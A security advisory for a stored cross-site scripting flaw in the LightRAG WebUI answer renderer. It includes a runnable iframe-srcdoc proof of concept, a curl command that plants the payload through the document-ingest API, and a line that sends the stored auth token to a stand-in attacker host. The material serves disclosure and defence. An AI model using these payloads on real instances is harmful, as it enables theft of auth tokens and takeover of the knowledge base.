lightrag-hku: Stored Cross-Site Scripting (XSS) in the LightRAG WebUI chat/answer renderer via ingested content
위협 신호 · CVSS · EPSS · KEV
이론적 심각도 점수
예측 데이터 없음
실측 악용 기록 없음
계획된 패치 주기 내 조치(60일 이내)
CVSS 벡터 · 메트릭
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N상세 설명
Summary
The LightRAG WebUI renders assistant/answer chat content as raw HTML — react-markdown is
configured with rehypePlugins={[rehypeRaw]} and skipHtml={false} and no HTML sanitizer
(rehype-sanitize), element allow-list, or custom urlTransform. Because answer content is derived
from user-ingested documents, an attacker who can add a single document can store an HTML/JavaScript
payload that executes in the browser of any user who later retrieves it (typically an administrator),
leading to auth-token theft from localStorage and full API takeover. No authentication is required in
the default configuration.
Details
Sink — lightrag_webui/src/components/retrieval/ChatMessage.tsx:
- Main answer (
MessageMarkdown, lines ~348-351) and thinking content (lines ~252-272) render with
rehypePlugins={[rehypeRaw, …]}andskipHtml={false}. Thecomponentsmap (lines ~111-156) only
restyles safe formatting tags (p,h1–h4,ul,ol,li,code); there is no
rehype-sanitize, noallowedElements/disallowedElements, and no customurlTransform. - Second sink: mermaid is initialized with
securityLevel: 'loose'(line ~433) and the rendered SVG is
injected viacontainer.innerHTML = svg(line ~483) +bindFunctions(container).'loose'disables
mermaid's output sanitization, so a```mermaidblock in answer content (HTML label /click
directive) is an additional script-execution path. - Hardening (not code execution): KaTeX is set with
trust: true(lines ~261/~359).\href{javascript:…}
is blocked by React 19, but\includegraphics{URL}renders a live remote<img src>(arbitrary
external resource load from the victim's browser). Recommendtrust: false.
Source → sink:
POST /documents/text or POST /documents/upload stores the document → POST /query returns it
(verbatim when only_need_context=true, lightrag/api/routers/query_routes.py:27; otherwise echoed by
the LLM) → the response is streamed into assistantMessage.content
(lightrag_webui/src/features/RetrievalView.tsx:340) → rendered by the sink above.
react-markdown's built-in defenses do NOT cover this: it sanitizes href/src URLs (so javascript:
links are blocked) and React ignores string event handlers (so <img onerror> is dropped), but raw
elements such as <iframe srcdoc="…"> and <svg><script> are rendered unchanged and execute.
PoC
Benign, local-only. Tested at commit f3378a3 (v1.5.5) with react@19, react-markdown@10.1.0,
rehype-raw@7.0.0.
Fastest check (code review, ~10s): in ChatMessage.tsx, the <ReactMarkdown> that renders answers
uses rehypePlugins={[rehypeRaw, …]} with skipHtml={false} and no rehype-sanitize / allow-list.
Per react-markdown's own documentation, rehype-raw on untrusted input without rehype-sanitize
allows HTML injection — that is the vulnerability.
Runnable proof (~2 min) — reproduces the exact renderer config and shows it execute in a browser:
1mkdir xss-check && cd xss-check 2npm init -y 3npm install react@19 react-dom@19 react-markdown@10 rehype-raw@7 4# save the script below as poc.mjs, then: 5node poc.mjs 6# open the generated poc.html in any browser (or headless): 7# msedge --headless=new --dump-dom "file:///ABS/PATH/poc.html"poc.mjs:
1import React from 'react'; 2import { renderToStaticMarkup } from 'react-dom/server'; 3import ReactMarkdown from 'react-markdown'; 4import rehypeRaw from 'rehype-raw'; 5import { writeFileSync } from 'fs'; 6 7// Stands in for an assistant answer built from an ingested document. 8const answer = 9 `<iframe srcdoc="<script>` +10 `var h=parent.document.createElement('h1');h.style.color='red';` +11 `h.textContent='XSS EXECUTED on '+(parent.document.domain||'this page');` +12 `parent.document.body.appendChild(h);parent.document.title='XSS-EXECUTED';` +13 `<\/script>"></iframe>`;14 15// EXACT options from ChatMessage.tsx (rehypeRaw + skipHtml:false, no sanitizer):16const body = renderToStaticMarkup(17 React.createElement(ReactMarkdown, { rehypePlugins: [rehypeRaw], skipHtml: false }, answer)18);19writeFileSync('poc.html', `<!doctype html><title>before-xss</title><body>${body}</body>`);20console.log(body); // note the LIVE <iframe srcDoc="..."> — not HTML-escapedObserved (verified in headless Chromium/Edge): the injected srcdoc script runs — the page title
becomes XSS-EXECUTED and a red "XSS EXECUTED on this page" heading is appended to the document. This
confirms attacker HTML in answer content executes. (Separately: <script>, <svg><script>, and
<iframe srcdoc> survive rendering; <img onerror> and javascript: links are neutralized by React /
react-markdown, so <iframe srcdoc> is the reliable vector.)
Illustrative end-to-end source path (in a live instance):
1curl -X POST http://127.0.0.1:9621/documents/text \ 2 -H 'Content-Type: application/json' \ 3 -d '{"text":"<iframe srcdoc=\"<script>document.title=document.domain</script>\"></iframe>","file_source":"note.md"}'Then query the knowledge base from the WebUI (or POST /query with only_need_context=true); the stored
payload renders and the benign marker script runs in the viewer's browser (the page title becomes the
origin). A real attacker replaces the benign marker with
fetch('//attacker/?t='+localStorage.getItem('LIGHTRAG-API-TOKEN')) to exfiltrate the victim's JWT
(verified storage key) and impersonate them against the API.
Impact
Stored (persistent) cross-site scripting. Any user in the default no-auth deployment, or any
authenticated low-privilege collaborator when auth is enabled, can plant a document whose content runs
arbitrary JavaScript in the browser of every user who later retrieves it. Because LightRAG keeps the
auth token in localStorage, the injected script can read it and drive the API as the victim
(exfiltrate/modify/delete the knowledge base and graph, upload documents) — i.e. escalate to full
account/instance takeover.
AI 심층 분석
공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.
참고 자료 6
링크 내용 불러오는 중…